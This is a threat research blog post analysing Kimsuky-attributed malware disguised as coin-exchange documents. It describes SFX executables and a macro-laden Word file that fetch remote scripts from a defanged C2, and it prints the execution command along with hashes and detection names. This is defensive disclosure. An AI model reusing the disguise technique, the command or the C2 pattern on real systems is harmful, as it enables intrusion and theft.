Threat Research

Distribution of Malware Disguised as Coin and Investment-related Content – ASEC BLOG

Securonix

AhnLab Security Emergency response Center (ASEC) has recently confirmed the distribution of malware disguised with coin exchange and investment-related topics. The malware is being distributed in the form of an executable and a Word file. Based on the User-Agent name used in the malware, it is suspected that it was created by the Kimsuky group. The confirmed filenames are as follows:

Date Filename
07.17 20230717_030190045911.pdf .exe
07.28 0728-We**Wallet Automatic Withdrawal of Funds.docx.exe (assumed)
07.28 230728 We**Team – Wallet Hacking Similarities.docx.exe (assumed)
07.28 We** Team – Ban on Cloud Usage.doc
Table 1. Confirmed filenames

Executables

The executables identified in Table 1 are disguised with Word document and PDF icons, making them appear like normal files.

Figure 1. Icons of executables

The above malicious executables are in the form of self-extracting archives (SFX) containing normal files within. Therefore, when the file is executed, the following normal document files are generated.

Figure 2. Normal document files created by each executable

Each document file contains content impersonating asset management and coin exchanges. The contents of each document are as follows.

Figure 3. 20230717_030190045911.pdf
Figure 4. 0728-We**Wallet Automatic Withdrawal of Funds.docx.exe
Figure 5. 230728 We**Team – Wallet Hacking Similarities.docx.exe

The archive content of each executable includes the normal documents identified in Figure 2, along with a command to access a specific URL.

Figure 6. Archive content of the executables

As a result, upon executing a file, a normal document is generated, and mshta.exe is utilized to execute the script code present in the malicious URL. At the time of analysis, access to the mentioned URL was not possible, so the exact behavior could not be confirmed. Below are the confirmed malicious URLs.

  • hxxps://partner24[.]kr/mokozy/hope/biz.php
  • hxxps://partner24[.]kr/mokozy/hope/doc1.php
  • hxxps://partner24[.]kr/mokozy/hope/doc2.php

Document File

Aside from the aforementioned SFX-type executables, the threat actor appears to have also distributed a Word document containing a VBA macro. The identified document file also bears the same disguising filename as the malicious executables, as it pretends to be related to coin exchange.

When the document file is opened, the text color in the body is set to gray, as shown below, manipulating users into clicking the Enable Content button. Upon clicking this button, the VBA macro code embedded in the document is executed, changing the text color in the body to black, as seen in Figure 8, enabling users to view the content.

Figure 7. Contents of the document file
Figure 8. Contents of the document file after the macro is run

When the VBA macro embedded in the document is executed, the normal wscript.exe file in the %windir%system32 directory is copied under the name word.exe in the %appdata% folder. Afterward, it downloads an additional Base64-encoded script from hxxps://partner24[.]kr/mokozy/hope/kk.php before decoding it and saving it in the %USERPROFILE% folder as set.sl. The created set.sl file is executed with the following command.

  • cmd /c %appdata%word.exe //e:vbscript //b %USERPROFILE%set.sl
Figure 9. A part of the VBA macro code

At the time of analysis, the code downloaded from hxxps://partner24[.]kr/mokozy/hope/kk.php did not perform any particular malicious behaviors, but various malicious commands can be executed through it according to the threat actor’s intent. The code saved in set.sl at the time of analysis is as follows.

Figure 10. Contents of the created set.sl file

Considering that the malware in question uses Chnome instead of Chrome as the User-Agent in the macro code shown in Figure 9, the Kimsuky group is suspected to have created it. (1) Furthermore, the fact that both the executables and document file share the same coin exchange name in their filenames and connect to the same C2 address suggests that the executables were also created by the same threat group.

Currently, the exact script that is ultimately executed cannot be identified due to the C2 being inaccessible. However, given the potential for various malicious behaviors such as exfiltrating user credentials and downloading additional malware, users should exercise extra caution.

[File Detection]
Downloader/DOC.Generic (2023.07.28.03)
Downloader/Win.Agent (2023.07.31.03)  

[Behavior Detection by AhnLab Product Type]
V3: Execution/MDP.Wscript.M4703
V3: Execution/MDP.Wscript.M11242
EDR: Execution/EDR.Wscript.M11243
EDR: Execution/EDR.Mshta.M11245
MDS: Execution/MDP.Mshta.M4704
MDS: Execution/MDP.Mshta.M11244

[IOC]
8a5fd1e9c9841ff0253b2a6f1e533d0e (exe)
002105e21f1bddf68e59743c440e416a (exe)
17daf3ea7b80ee95792d4b3332a3390d (exe)
b6614471ebf288689d33808c376540e1 (word)
hxxps://partner24[.]kr/mokozy/hope/biz.php
hxxps://partner24[.]kr/mokozy/hope/doc1.php
hxxps://partner24[.]kr/mokozy/hope/doc2.php
hxxps://partner24[.]kr/mokozy/hope/kk.php

[References]
(1) https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/55944/

Tags: EDR, CLOUD